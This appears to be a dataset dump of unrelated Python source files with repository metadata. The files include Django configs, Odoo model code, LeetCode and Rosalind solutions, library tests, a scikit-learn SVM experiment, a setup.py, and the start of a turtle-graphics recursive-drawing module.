self.env['siswa_keu_ocb11.siswa_biaya'].search(['&', '&', '&',
('tahunajaran_id', '=', self.tahunajaran_jenjang_id.tahunajaran_id.id),
('biaya_id', '=', self.biaya_id.id),
('state', '=', 'open'),
('siswa_id', '=', siswa.id),
]).unlink()
# Recompute Tagihan Siswa Dashboard/ Keuangan Dashboard
self.recompute_dashboard()
def recompute_dashboard(self):
dash_keuangan_id = self.env['ir.model.data'].search([('name', '=', 'default_dashboard_pembayaran')]).res_id
dash_keuangan = self.env['siswa_keu_ocb11.keuangan_dashboard'].search([('id', '=', dash_keuangan_id)])
for dash in dash_keuangan:
dash.compute_keuangan()
print('Recompute Keuangan Dashboard done')
@api.model
def create(self, vals):
if not vals['is_different_by_gender']:
vals['harga_alt'] = vals['harga']
result = super(biaya_ta_jenjang, self).create(vals)
return result
@api.multi
def write(self, vals):
self.ensure_one()
# print('isisnya : ')
# pprint(vals)
# # get biaya
# # biaya_ta_jenjang = self.env['siswa_keu_ocb11.biaya_ta_jenjang'].search([('id','=',vals['id'])])
# biaya = self.env['siswa_keu_ocb11.biaya'].search([('id','=',vals['biaya_id'])])
# if not biaya[0].is_different_by_gender: #vals['is_different_by_gender']:
if not self.biaya_id.is_different_by_gender:
if 'harga' in vals:
vals['harga_alt'] = vals['harga']
res = super(biaya_ta_jenjang, self).write(vals)
return res
| [
"[email protected]"
] | |
53bd002833d9a292adb9fc9597fcf51a13a3e702 | ff7d3116024c9df01b94191ddfa334e4a6782ae6 | /mandal/asgi.py | b5b92dc813812b64f6029c072cbb314048f69a23 | [
"MIT"
] | permissive | jhnnsrs/arbeider | f5f708ee1026a9e9573a6f8a87c3b9e2fd6b5e33 | 4c5637913331c998a262ae0deca516b236845200 | refs/heads/master | 2021-05-26T10:31:16.279628 | 2020-04-08T13:40:26 | 2020-04-08T13:40:26 | 254,095,863 | 0 | 0 | MIT | 2020-04-08T13:40:28 | 2020-04-08T13:29:31 | null | UTF-8 | Python | false | false | 318 | py | """
ASGI entrypoint. Configures Django and then runs the application
defined in the ASGI_APPLICATION setting.
"""
import os
import django
from channels.routing import get_default_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mandal.settings")
django.setup()
application = get_default_application()
| [
"[email protected]"
] | |
16573c15b3817ed9f64b13f466428536b50da9d6 | 5b4312ddc24f29538dce0444b7be81e17191c005 | /autoware.ai/1.12.0_cuda/build/waypoint_follower/catkin_generated/generate_cached_setup.py | 01cfc657005e5167ef4e8abd08b42b76f522be17 | [
"MIT"
] | permissive | muyangren907/autoware | b842f1aeb2bfe7913fb2be002ea4fc426b4e9be2 | 5ae70f0cdaf5fc70b91cd727cf5b5f90bc399d38 | refs/heads/master | 2020-09-22T13:08:14.237380 | 2019-12-03T07:12:49 | 2019-12-03T07:12:49 | 225,167,473 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,929 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in "/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_health_checker;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/amathutils_lib;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/tablet_socket_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_system_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_config_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_build_flags;/opt/ros/melodic".split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/build/waypoint_follower/devel/env.sh')
output_filename = '/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/build/waypoint_follower/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
#print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| [
"[email protected]"
] | |
4ff946b307a86955672b905e0806efb85572c652 | 198f759dc334df0431cbc25ed4243e86b93571eb | /drop/wsgi.py | 0dbf4b2caf4a9cd90fadce8e2d1d88950fcb3cfe | [] | no_license | miladhzz/django-muliple-db | ec2074b14dd67a547c982f20b2586f435e7e0d6c | 56ff2555e498d9105cad215daf4c3d4da59d7d9a | refs/heads/master | 2022-12-25T08:08:05.761226 | 2020-10-06T06:38:30 | 2020-10-06T06:38:30 | 301,636,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | """
WSGI config for drop project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'drop.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
0a8b93c86f1f59ac957d675eef30b726dc06c777 | 52a4d869976a97498bdf56a8d0ff92cac138a136 | /Algorithmic Heights/rosalind_3_degarray.py | 1ed82de8791f3769afe522fe22c1bee1abb2a87e | [] | no_license | aakibinesar/Rosalind | d726369a787d848cc378976b886189978a60a3a5 | 375bbdbfb16bf11b2f980701bbd0ba74a1605cdb | refs/heads/master | 2022-08-18T09:36:00.941080 | 2020-05-24T18:49:38 | 2020-05-24T18:49:38 | 264,722,651 | 0 | 0 | null | 2020-05-17T17:51:03 | 2020-05-17T17:40:59 | null | UTF-8 | Python | false | false | 380 | py | file = open('rosalind_deg.txt','r').readlines()
vertices, edges = (int(val) for val in file[0].split())
my_data = [[int(val) for val in line.split()] for line in file[1:]]
count = 0
L = []
for k in range(1,vertices+1):
count = 0
for i in range(2):
for j in range(0,edges):
if my_data[j][i] == k:
count+=1
L.append(count)
print(' '.join(str(num) for num in L)) | [
"[email protected]"
] | |
3e677c83fd12cc5c2661147aa8b3dca9d0b689e4 | 15c4278a1a70ad3c842b72cba344f96fca43f991 | /newpro/newapp/admin.py | 37dac0ac21c8bfb1c6e0d008a060f3977faa28a0 | [] | no_license | nivyashri05/Task1 | d9914cf5bb8947ef00e54f77480c6f5f375c76ad | 9e9b03961eb1144d1b1a936159082ad80d32ce31 | refs/heads/master | 2023-01-06T01:04:17.321503 | 2020-11-10T15:31:02 | 2020-11-10T15:31:02 | 311,691,678 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 434 | py |
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from newapp.models import User
class UserAdmin(BaseUserAdmin):
list_display = ('email','username','phone','is_admin','is_staff','timestamp')
search_fields = ('email','username',)
readonly_fields=('date_joined', 'last_login')
filter_horizontal = ()
list_filter = ()
fieldsets = ()
admin.site.register(User, BaseUserAdmin)
| [
"[email protected]"
] | |
16d4ac62c0efe8567434b83a272a3035cd8c8990 | d75371f629cf881de3c49b53533879a5b862da2e | /python/search-a-2d-matrix.py | 3ce6ce1d52b91816fccec4a1e5592f5c548b2cf5 | [] | no_license | michaelrbock/leet-code | 7352a1e56429bb03842b588ba6bda2a90315a2f4 | 070db59d4e0ded3fb168c89c3d73cb09b3c4fe86 | refs/heads/master | 2020-04-01T05:40:49.262575 | 2019-10-10T22:03:10 | 2019-10-10T22:03:10 | 152,914,631 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,614 | py | def binary_row(rows, target):
if len(rows) == 1:
return 0, None
if len(rows) == 2:
return (1, None) if target >= rows[1] else (0, None)
lo = 0
hi = len(rows)
while lo < hi:
mid = (lo + hi) // 2
if rows[mid] == target:
return mid, True
if mid == len(rows) - 1:
return len(rows) - 1, None
if rows[mid] < target and rows[mid + 1] > target:
return mid, None
elif target > rows[mid]:
lo = mid
else:
hi = mid
return len(rows) - 1, None
def binary_search(lst, target):
if not lst:
return False
if len(lst) == 1:
return lst[0] == target
lo = 0
hi = len(lst)
while lo <= hi:
mid = (lo + hi) // 2
if lst[mid] == target:
return True
elif target > lst[mid]:
if lo == mid:
break
lo = mid
elif target < lst[mid]:
hi = mid
return False
class Solution1:
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
if not matrix or not matrix[0] or matrix[0][0] > target:
return False
row, result = binary_row([row[0] for row in matrix], target)
if result is not None:
return result
return binary_search(matrix[row], target)
def _translate(index, rows, cols):
"""Returns (row, col) for overall index."""
row = index // cols
col = index % cols
return row, col
class Solution:
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
if not matrix or not matrix[0]:
return False
# Strategy: binary search, but treat the matrix as if
# it was one long array. Translate overall index into
# row/col indices.
m, n = len(matrix), len(matrix[0]) # num row, num cols
start = 0 # indices as if matrix was one long list
end = m * n - 1 # incluive
while start <= end and start >= 0 and end < m * n:
mid = (start + end) // 2
row, col = _translate(mid, m, n)
if target == matrix[row][col]:
return True
elif target > matrix[row][col]:
start = mid + 1
else: # target < matrix[row][col]
end = mid - 1
return False
s = Solution()
assert not s.searchMatrix([[-10,-8,-8,-8],[-5,-4,-2,0]], 7)
assert s.searchMatrix([[1, 3, 5, 7],[10, 11, 16, 20],[23, 30, 34, 50]], 3)
assert not s.searchMatrix([[1, 3, 5, 7],[10, 11, 16, 20],[23, 30, 34, 50]], 13)
assert not s.searchMatrix([[1, 1]], 0)
assert not s.searchMatrix([[1, 1]], 2)
assert not s.searchMatrix([[-10,-8,-8,-8],[-5,-4,-2,0]], 7)
print('All tests passed!')
| [
"[email protected]"
] | |
8f9842cabc131fddc1025c2ab9121b0af86a3297 | d9a65120e6b8d20d3b568acde8ceb66f908d1ffc | /django1/src/vote/urls.py | 68755a03d624470c3b5e239836982709943bda16 | [] | no_license | omniverse186/django1 | aba57d705bd7b3a142f627e566853811038d6d6c | f257c34c9d09467170a5f3bd24598d97dcf64f4f | refs/heads/master | 2020-04-21T23:11:17.677609 | 2019-02-10T03:20:47 | 2019-02-10T03:20:47 | 169,938,176 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 838 | py | '''
Created on 2019. 1. 20.
@author: user
'''
#하위 URLConf
#app_name : 하위 URLConf 파일의 등록된 URL들의 그룹명
#urlpatterns : URL과 뷰함수를 리스트 형태로 등록하는 변수
from django.urls import path
from .views import *
app_name = 'vote'
urlpatterns = [
#name : 해당 URL, 뷰함수 등록에 대해서 별칭을 지정
path('', index, name= 'index'),
path('<int:q_id>/', detail, name='detail'),
path('vote/', vote, name='vote'),
path('result/<int:q_id>',result, name='result'),
path('qr/', qregister, name='qr' ),
path('qu/<int:q_id>/', qupdate, name = 'qu'),
path('qd/<int:q_id>/', qdelete, name='qd'),
path('cr/', cregister, name='cr'),
path('cu/<int:c_id>/', cupdate, name='cu'),
path('cd/<int:c_id>/', cdelete, name='cd')
] | [
"user@DESKTOP-37GULAI"
] | user@DESKTOP-37GULAI |
1c98f010be779b0df3ae626d838b4e5e5e86525c | d24e06a9fb04ada28de067be1b6be50a7a92f294 | /Assignment1/svm_test.py | c916d079fcf86ddccff119130ecb3486e4f6dee4 | [] | no_license | sentientmachine/CS7641 | 3960b3e216f1eddc9a782318a9bf3ae38fed1959 | a9a1369acfdd3e846e311c64498a38c8afd8fcc2 | refs/heads/master | 2020-12-25T03:11:46.621886 | 2017-12-24T12:24:14 | 2017-12-24T12:24:14 | 51,779,034 | 0 | 0 | null | 2016-02-15T19:17:10 | 2016-02-15T19:17:10 | null | UTF-8 | Python | false | false | 4,649 | py | import io
import pydotplus
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.svm import SVC
from sklearn.model_selection import StratifiedKFold
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import MinMaxScaler, StandardScaler, OneHotEncoder, Imputer
#from sklearn.metrics import accuracy_score
from plot_curves import *
class rb_svm_test:
def __init__(self, x_train, x_test, y_train, y_test, x_col_names, data_label, cv):
self.x_train = x_train
self.x_test = x_test
self.y_train = y_train
self.y_test = y_test
self.x_col_names = x_col_names
self.data_label = data_label
self.cv = cv
def run_cv_model(self, C=1.0, degree=3, cache_size=200, do_plot=True):
# use k-fold cross validation
# we need to standardize the data for the KNN learner
pipe_clf = Pipeline([ ('scl', StandardScaler() ),
('clf', SVC(C=C, degree=degree, cache_size=cache_size))])
# resample the test data without replacement. This means that each data point is part of a test a
# training set only once. (paraphrased from Raschka p.176). In Stratified KFold, the features are
# evenly disributed such that each test and training set is an accurate representation of the whole
# this is the 0.17 version
#kfold = StratifiedKFold(y=self.y_train, n_folds=self.cv, random_state=0)
# this is the 0.18dev version
skf = StratifiedKFold(n_folds=self.cv, random_state=0)
# do the cross validation
train_scores = []
test_scores = []
#for k, (train, test) in enumerate(kfold):
for k, (train, test) in enumerate(skf.split(X=self.x_train, y=self.y_train)):
# run the learning algorithm
pipe_clf.fit(self.x_train[train], self.y_train[train])
train_score = pipe_clf.score(self.x_train[test], self.y_train[test])
train_scores.append(train_score)
test_score = pipe_clf.score(self.x_test, self.y_test)
test_scores.append(test_score)
print('Fold:', k+1, ', Training score:', train_score, ', Test score:', test_score)
train_score = np.mean(train_scores)
print('Training score is', train_score)
test_score = np.mean(test_scores)
print('Test score is', test_score)
if do_plot:
self.__plot_learning_curve(pipe_clf)
return train_score, test_score
def run_model(self, C=1.0, degree=3, cache_size=200, do_plot=True):
# we need to standardize the data for the learner
pipe_clf = Pipeline([ ('scl', StandardScaler() ),
('clf', SVC(C=C, degree=degree, cache_size=cache_size))])
# test it: this should match the non-pipelined call
pipe_clf.fit(self.x_train, self.y_train)
# check model accuracy
train_score = pipe_clf.score(self.x_train, self.y_train)
print('Training score is', train_score)
test_score = pipe_clf.score(self.x_test, self.y_test)
print('Test score is', test_score)
if do_plot:
self.__plot_learning_curve(pipe_clf)
self.__plot_decision_boundaries(pipe_clf)
return train_score, test_score
def __plot_learning_curve(self, estimator):
plc = rb_plot_curves()
plc.plot_learning_curve(estimator, self.x_train, self.y_train, self.cv, self.data_label)
def plot_validation_curve(self, C=1.0, degree=3, cache_size=200):
estimator = Pipeline([ ('scl', StandardScaler() ),
('clf', SVC(C=C, degree=degree, cache_size=cache_size))])
param_names = ['clf__C']
param_ranges = [np.arange(1.0,10.0,1.)]
data_label = self.data_label
plc = rb_plot_curves()
for i in range(len(param_names)):
param_name = param_names[i]
param_range = param_ranges[i]
plc.plot_validation_curve(estimator, self.x_train, self.y_train,
self.cv, data_label,
param_range, param_name)
def __plot_decision_boundaries(self, estimator):
plc = rb_plot_curves()
features = pd.DataFrame(self.x_train)
features.columns = self.x_col_names
plc.plot_decision_boundaries(estimator, features, self.y_train, self.data_label) | [
"="
] | = |
a688ca2e222977722e0df277f47979059d2e8e1b | 99eb4013a12ddac44042d3305a16edac1c9e2d67 | /test/test_raw_shape_map.py | 1a6b72fc298a5b35beaa25426e64cdf336fc34fa | [
"Apache-2.0"
] | permissive | DaniFdezAlvarez/shexer | cd4816991ec630a81fd9dd58a291a78af7aee491 | 7ab457b6fa4b30f9e0e8b0aaf25f9b4f4fcbf6d9 | refs/heads/master | 2023-05-24T18:46:26.209094 | 2023-05-09T18:25:27 | 2023-05-09T18:25:27 | 132,451,334 | 24 | 2 | Apache-2.0 | 2023-05-03T18:39:57 | 2018-05-07T11:32:26 | Python | UTF-8 | Python | false | false | 4,212 | py | import unittest
from shexer.shaper import Shaper
from test.const import G1, BASE_FILES, default_namespaces
from test.t_utils import file_vs_str_tunned_comparison
import os.path as pth
from shexer.consts import TURTLE
_BASE_DIR = BASE_FILES + "shape_map" + pth.sep
class TestRawShapeMap(unittest.TestCase):
def test_node(self):
shape_map = "<http://example.org/Jimmy>@<Person>"
shaper = Shaper(graph_file_input=G1,
namespaces_dict=default_namespaces(),
all_classes_mode=False,
input_format=TURTLE,
disable_comments=True,
shape_map_raw=shape_map
)
str_result = shaper.shex_graph(string_output=True)
self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "a_node.shex",
str_target=str_result))
def test_prefixed_node(self):
shape_map = "ex:Jimmy@<Person>"
shaper = Shaper(graph_file_input=G1,
namespaces_dict=default_namespaces(),
all_classes_mode=False,
input_format=TURTLE,
disable_comments=True,
shape_map_raw=shape_map
)
str_result = shaper.shex_graph(string_output=True)
self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "a_node.shex",
str_target=str_result))
def test_focus(self):
shape_map = "{FOCUS a foaf:Person}@<Person>"
shaper = Shaper(graph_file_input=G1,
namespaces_dict=default_namespaces(),
all_classes_mode=False,
input_format=TURTLE,
disable_comments=True,
shape_map_raw=shape_map
)
str_result = shaper.shex_graph(string_output=True)
self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "focus_nodes.shex",
str_target=str_result))
def test_focus_wildcard(self):
shape_map = "{FOCUS foaf:name _}@<WithName>"
shaper = Shaper(graph_file_input=G1,
namespaces_dict=default_namespaces(),
all_classes_mode=False,
input_format=TURTLE,
disable_comments=True,
shape_map_raw=shape_map
)
str_result = shaper.shex_graph(string_output=True)
self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "focus_and_wildcard.shex",
str_target=str_result))
def test_sparql_selector(self):
shape_map = "SPARQL \"select ?p where { ?p a foaf:Person }\"@<Person>"
shaper = Shaper(graph_file_input=G1,
namespaces_dict=default_namespaces(),
all_classes_mode=False,
input_format=TURTLE,
disable_comments=True,
shape_map_raw=shape_map
)
str_result = shaper.shex_graph(string_output=True)
self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "focus_nodes.shex",
str_target=str_result))
def test_several_shapemap_items(self):
shape_map = "{FOCUS a foaf:Person}@<Person>\n{FOCUS a foaf:Document}@<Document>"
shaper = Shaper(graph_file_input=G1,
namespaces_dict=default_namespaces(),
all_classes_mode=False,
input_format=TURTLE,
disable_comments=True,
shape_map_raw=shape_map
)
str_result = shaper.shex_graph(string_output=True)
self.assertTrue(file_vs_str_tunned_comparison(file_path=_BASE_DIR + "several_shm_items.shex",
str_target=str_result))
| [
"[email protected]"
] | |
3e034a11bde11aa6a40bca38c774c9dba4dc8ef4 | 9b422078f4ae22fe16610f2ebc54b8c7d905ccad | /xlsxwriter/test/comparison/test_chart_format07.py | 45e9369b2bac7462c137134173b1cda4559f1696 | [
"BSD-2-Clause-Views"
] | permissive | projectsmahendra/XlsxWriter | 73d8c73ea648a911deea63cb46b9069fb4116b60 | 9b9d6fb283c89af8b6c89ad20f72b8208c2aeb45 | refs/heads/master | 2023-07-21T19:40:41.103336 | 2023-07-08T16:54:37 | 2023-07-08T16:54:37 | 353,636,960 | 0 | 0 | NOASSERTION | 2021-04-01T08:57:21 | 2021-04-01T08:57:20 | null | UTF-8 | Python | false | false | 1,582 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, John McNamara, [email protected]
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('chart_format07.xlsx')
def test_create_file(self):
"""Test the creation of an XlsxWriter file with chart formatting."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'line'})
chart.axis_ids = [46163840, 46175360]
data = [
[1, 2, 3, 4, 5],
[2, 4, 6, 8, 10],
[3, 6, 9, 12, 15],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({
'categories': '=Sheet1!$A$1:$A$5',
'values': '=Sheet1!$B$1:$B$5',
'marker': {
'type': 'square',
'size': 5,
'line': {'color': 'yellow'},
'fill': {'color': 'red'},
},
})
chart.add_series({
'categories': '=Sheet1!$A$1:$A$5',
'values': '=Sheet1!$C$1:$C$5',
})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
| [
"[email protected]"
] | |
35eada1e6e31e47d1156a2dd8c85c2aada530ebe | 4fbd844113ec9d8c526d5f186274b40ad5502aa3 | /algorithms/python3/pacific_atlantic_water_flow.py | 6a5e0384ee2afe8a2dd84a801719431deeaa3b09 | [] | no_license | capric8416/leetcode | 51f9bdc3fa26b010e8a1e8203a7e1bcd70ace9e1 | 503b2e303b10a455be9596c31975ee7973819a3c | refs/heads/master | 2022-07-16T21:41:07.492706 | 2020-04-22T06:18:16 | 2020-04-22T06:18:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,244 | py | # !/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Given an m x n matrix of non-negative integers representing the height of each unit cell in a continent, the "Pacific ocean" touches the left and top edges of the matrix and the "Atlantic ocean" touches the right and bottom edges.
Water can only flow in four directions (up, down, left, or right) from a cell to another one with height equal or lower.
Find the list of grid coordinates where water can flow to both the Pacific and Atlantic ocean.
Note:
The order of returned grid coordinates does not matter.
Both m and n are less than 150.
Example:
Given the following 5x5 matrix:
Pacific ~ ~ ~ ~ ~
~ 1 2 2 3 (5) *
~ 3 2 3 (4) (4) *
~ 2 4 (5) 3 1 *
~ (6) (7) 1 4 5 *
~ (5) 1 1 2 4 *
* * * * * Atlantic
Return:
[[0, 4], [1, 3], [1, 4], [2, 2], [3, 0], [3, 1], [4, 0]] (positions with parentheses in above matrix).
"""
""" ==================== body ==================== """
class Solution:
def pacificAtlantic(self, matrix):
"""
:type matrix: List[List[int]]
:rtype: List[List[int]]
"""
""" ==================== body ==================== """
| [
"[email protected]"
] | |
93117ac33ad6602c755054bba6d85d4308a19d77 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /L7NK7McEQ9yEpTXRE_16.py | d1817c7d7db4293f1356e203513e2932567c3783 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py |
def XOR(a, b):
a = a ^ b
b = a ^ b
a = a ^ b
return [a,b]
| [
"[email protected]"
] | |
39f51b8befba9f505afddabff3d6d21823fa7df5 | adb759899204e61042225fabb64f6c1a55dac8ce | /1900~1999/1904.py | 8a490e0cc71ac769e26193e2bc6f97c4d01e51cb | [] | no_license | geneeol/baekjoon-online-judge | 21cdffc7067481b29b18c09c9152135efc82c40d | 2b359aa3f1c90f178d0c86ce71a0580b18adad6f | refs/heads/master | 2023-03-28T23:25:12.219487 | 2021-04-01T09:19:06 | 2021-04-01T09:19:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,478 | py | # 문제
# 지원이에게 2진 수열을 가르쳐 주기 위해, 지원이 아버지는 그에게 타일들을 선물해주셨다.
# 그리고 이 각각의 타일들은 0 또는 1이 쓰여 있는 낱장의 타일들이다.
# 어느 날 짓궂은 동주가 지원이의 공부를 방해하기 위해 0이 쓰여진 낱장의 타일들을 붙여서 한 쌍으로 이루어진 00 타일들을 만들었다.
# 결국 현재 1 하나만으로 이루어진 타일 또는 0타일을 두 개 붙인 한 쌍의 00타일들만이 남게 되었다.
# 그러므로 지원이는 타일로 더 이상 크기가 N인 모든 2진 수열을 만들 수 없게 되었다.
# 예를 들어, N=1일 때 1만 만들 수 있고, N=2일 때는 00, 11을 만들 수 있다. (01, 10은 만들 수 없게 되었다.)
# 또한 N=4일 때는 0011, 0000, 1001, 1100, 1111 등 총 5개의 2진 수열을 만들 수 있다.
# 우리의 목표는 N이 주어졌을 때 지원이가 만들 수 있는 모든 가짓수를 세는 것이다.
# 단 타일들은 무한히 많은 것으로 가정하자.
#
# 입력
# 첫 번째 줄에 자연수 N이 주어진다.(N ≤ 1,000,000)
#
# 출력
# 첫 번째 줄에 지원이가 만들 수 있는 길이가 N인 모든 2진 수열의 개수를 15746으로 나눈 나머지를 출력한다.
N = int(input())
MOD = 15746
dp = [0 for _ in range(1000001)]
dp[1], dp[2], dp[3] = 1, 2, 3
for i in range(4, 1000001):
dp[i] = (dp[i - 1] + dp[i - 2]) % MOD
print(dp[N])
| [
"[email protected]"
] | |
bd0aee949be51e9122bd5c53c9a3f1bed2200067 | 1865a8508bed279961abaef324b434c0e3caa815 | /setup.py | 261fb583f89174f98ea47d3f5b9b3cadf5e81b6b | [
"MIT"
] | permissive | zidarsk8/simple_wbd | de68cbefe94fda52ed5330ff55b97b4a73aedfb4 | 6c2d1611ffd70d3bf4468862b0b569131ef12d94 | refs/heads/master | 2021-01-19T10:54:38.824763 | 2016-08-16T03:58:42 | 2016-08-16T03:58:42 | 59,942,658 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,866 | py | #!/usr/bin/env python3
"""Simplo wbd setup file.
This is the main setup for simple wbd. To manually install this module run:
$ pip install .
For development to keep track of the changes in the module and to include
development and test dependecies run:
$ pip install --editable .[dev,test]
"""
from setuptools import setup
def get_description():
with open("README.rst") as f:
return f.read()
if __name__ == "__main__":
setup(
name="simple_wbd",
version="0.5.1",
license="MIT",
author="Miha Zidar",
author_email="[email protected]",
description=("A simple python interface for World Bank Data Indicator "
"and Climate APIs"),
long_description=get_description(),
url="https://github.com/zidarsk8/simple_wbd",
download_url="https://github.com/zidarsk8/simple_wbd/tarball/0.5.1",
packages=["simple_wbd"],
provides=["simple_wbd"],
install_requires=[
"pycountry"
],
extras_require={
"dev": [
"pylint"
],
"test": [
"codecov",
"coverage",
"mock",
"nose",
"vcrpy",
],
},
test_suite="tests",
keywords = [
"World Bank Data",
"indicator api",
"climate api",
],
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering",
],
)
| [
"[email protected]"
] | |
88ae046695faa97023e4952c85ae2915a6475290 | b1480f77540258ec08c9c35866138bfec839d7d0 | /src/drostedraw/__init__.py | 926f411cf29c3ff970f86b4bedac15a10a608353 | [
"MIT"
] | permissive | asweigart/drostedraw | 1fd69cac3659eaeebf8179f8015989b5d572c55b | d2a3620a4d2bda6fb76321883a3c9587abf6cec4 | refs/heads/main | 2023-08-04T18:23:21.586862 | 2021-09-14T17:35:00 | 2021-09-14T17:35:00 | 397,367,988 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,584 | py | """Droste Draw
By Al Sweigart [email protected]
A Python module for making recursive drawings (aka Droste effect) with the built-in turtle module."""
__version__ = '0.2.1'
import turtle, math
MAX_FUNCTION_CALLS = 10000 # Stop recursion after this many function calls.
MAX_ITERATION = 400 # Stop recursion after this iteration.
MIN_SIZE = 1 # Stop recursion if size is less than this.
# NOTE: In general, don't use absolute coordinate functions (like turtle.goto(), turtle.xcor(), turtle.ycor(),
# turtle.setheading()) in your draw functions because they might not work when the heading angle is not 0.
def drawSquare(size, extraData=None):
"""Draw a square where `size` is the length of each side."""
# Move the turtle to the top-right corner before drawing:
turtle.penup()
turtle.forward(size // 2) # Move to the right edge.
turtle.left(90) # Turn to face upwards.
turtle.forward(size // 2) # Move to the top-right corner.
turtle.left(180) # Turn around to face downwards.
turtle.pendown()
# Draw the four sides of a square:
for i in range(4):
turtle.forward(size)
turtle.right(90)
def drawTriangle(size, extraData=None):
"""Draw an equilateral triangle where `size` is the length of
each side."""
# Move the turtle to the top of the equilateral triangle:
height = (size * math.sqrt(3)) / 2
turtle.penup()
turtle.left(90) # Turn to face upwards.
turtle.forward(height * (2/3)) # Move to the top corner.
turtle.right(150) # Turn to face the bottom-right corner.
turtle.pendown()
# Draw the three sides of the triangle:
for i in range(3):
turtle.forward(size)
turtle.right(120)
def drawFilledSquare(size, extraData=None):
"""Draw a solid, filled-in square where `size` is the length of each
side. The extraData dictionary can have a key 'colors' whose value
is a list of "color strings" that the turtle module recognizes, e.g.
'red', 'black', etc. The first color string in the list is used
for the first iteration, the second for the second, and so on. When
you run out of colors for later iterations, the first color is used
again."""
# Move the turtle to the top-right corner before drawing:
turtle.penup()
turtle.forward(size // 2) # Move to the right edge.
turtle.left(90) # Turn to face upwards.
turtle.forward(size // 2) # Move to the top-right corner.
turtle.left(180) # Turn around to face downwards.
turtle.pendown()
# The extra data is a tuple of (fillcolor, pencolor) values:
if extraData is not None:
iteration = extraData['_iteration'] - 1 # -1 because iteration starts at 1, not 0.
turtle.fillcolor(extraData['colors'][iteration % len(extraData['colors'])])
turtle.pencolor(extraData['colors'][iteration % len(extraData['colors'])])
# Draw the four sides of a square:
turtle.begin_fill()
for i in range(4):
turtle.forward(size)
turtle.right(90)
turtle.end_fill()
def drawFilledDiamond(size, extraData=None):
# Move to the right corner before drawing:
turtle.penup()
turtle.forward(math.sqrt(size ** 2 / 2))
turtle.right(135)
turtle.pendown()
# The extra data is a tuple of (fillcolor, pencolor) values:
if extraData is not None:
iteration = extraData['_iteration'] - 1 # -1 because iteration starts at 1, not 0.
turtle.fillcolor(extraData['colors'][iteration % len(extraData['colors'])])
turtle.pencolor(extraData['colors'][iteration % len(extraData['colors'])])
# Draw a square:
turtle.begin_fill()
for i in range(4):
